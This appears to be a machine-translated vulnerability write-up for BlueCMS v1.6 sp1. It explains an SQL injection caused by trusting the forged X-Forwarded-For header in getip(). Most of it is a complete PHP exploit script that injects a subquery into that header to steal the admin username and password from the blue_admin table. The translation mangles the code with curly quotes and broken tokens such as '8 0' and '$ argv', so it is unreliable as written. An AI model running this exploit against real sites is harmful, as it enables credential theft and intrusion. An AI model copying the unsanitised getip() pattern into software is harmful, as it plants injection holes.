** * * , Description,**BlueCMS is a place to classified information portal dedicated CMS system.
Procedures in using the getip()function to get the Client ip when not strictly filter the data, resulting in sql injection vulnerability.
Second, the analysis
//comment.php
$sql = “INSERT INTO “. table(‘comment’).” (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check)VALUES (”, ‘$id’, ‘$user_id’, ‘$type’, ‘$mood’, ‘$content’, ‘$timestamp’, ‘“. getip().”’, ‘$is_check’)"; // note getip()
$db->query($sql);
Next take a look at this function
//include/common.fun.php
function getip()
{
if (getenv(‘HTTP_CLIENT_IP’))
{
$ip = getenv(‘HTTP_CLIENT_IP’); //can be forged
}
elseif (getenv(‘HTTP_X_FORWARDED_FOR’))
{
$ip = getenv(‘HTTP_X_FORWARDED_FOR’); //can be forged
}
elseif (getenv(‘HTTP_X_FORWARDED’))
{
$ip = getenv(‘HTTP_X_FORWARDED’);
}
elseif (getenv(‘HTTP_FORWARDED_FOR’))
{
$ip = getenv(‘HTTP_FORWARDED_FOR’);
}
elseif (getenv(‘HTTP_FORWARDED’))
{
$ip = getenv(‘HTTP_FORWARDED’);
}
else
{
$ip = $_SERVER[‘REMOTE_ADDR’];
}
return $ip;
}
Vulnerability is relatively simple,$_SERVER old problem.
Third, the use
Finally attach an exp
`<? php
print_r(’
±--------------------------------------------------------------------------+
BlueCMS v1. 6 sp1 Getip() Remote SQL Injection Exploit
by cnryan
±--------------------------------------------------------------------------+
‘);
if ($argc < 3) {
print_r(’
±--------------------------------------------------------------------------+
Example:
php ‘.$ argv[0].’ localhost /bluecms/
±--------------------------------------------------------------------------+
‘);
exit;
}
error_reporting(7);
ini_set(‘max_execution_time’, 0);
$host = $argv[1];
$path = $argv[2];
send();
send2();
function send()
{
global $host, $path;
$cmd = “mood=6&comment=test&id=1&type=1&submit=%CC%E1%BD%BB%C6%C0%C2%DB”;
$getinj=" 0 0’,‘1’),(“,‘1’,‘0’,‘1’,‘6’,(select concat(‘<u-’,admin_name,‘-u><p-’,pwd,‘-p>’) from blue_admin),‘1 2 8 1 1 8 1 9 7 3’,'9 9”;
$data = "POST ".$ path.“comment. php? act=send HTTP/1.1\r\n”;
$data .= “Accept: /\r\n”;
$data .= “Accept-Language: zh-cn\r\n”;
$data .= “Content-Type: application/x-www-form-urlencoded\r\n”;
$data .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n”;
$data .= “Host: $host\r\n”;
$data .= “Content-Length: “. strlen($cmd).”\ r\n”;
$data .= “Connection: Close\r\n”;
$data .= “X-Forwarded-For: $getinj\r\n\r\n”;
$data .= $cmd;
$fp = fsockopen($host, 8 0);
fputs($fp, $data);
$resp = ";
while ($fp && ! feof($fp))
$resp .= fread($fp, 1 0 2 4);
return $resp;
}
function send2()
{
global $host, $path;
$message=“GET “.$ path.“news. php? id=1 HTTP/1.1\r\n”;
$message.=” Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, application/xaml+xml, application/vnd. ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, /\r\n”;
$message.=" Accept-Language: zh-cn\r\n";
$message.=" Accept-Encoding: gzip, deflate\r\n";
$message.=" User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; . NET CLR 2.0.50727; GreenBrowser)\r\n";
$message.=" Host: $host\r\n";
$message.=" Connection: Keep-Alive\r\n\r\n";
$fd = fsockopen($host,‘8 0’);
if(!$ fd)
{
echo ‘[-]No response from’.$ host;
die;
}
fputs($fd,$message);
$resp = “;
while (! feof($fd)) {
$resp.= fgets($fd);
}
fclose($fd);
preg_match_all(”/<u-([^<])-u>A<p-([^<])-p>/“,$resp,$db);
if($db[1][0]&$db[2][0])
{
echo “username->”.$ db[1][0].”\ r\n";
echo “password->”.$ db[2][0].“\ r\n”;
echo “[+]congratulation ^ ^”;
}else die(‘[-]exploited fail >"<’);
}
?>`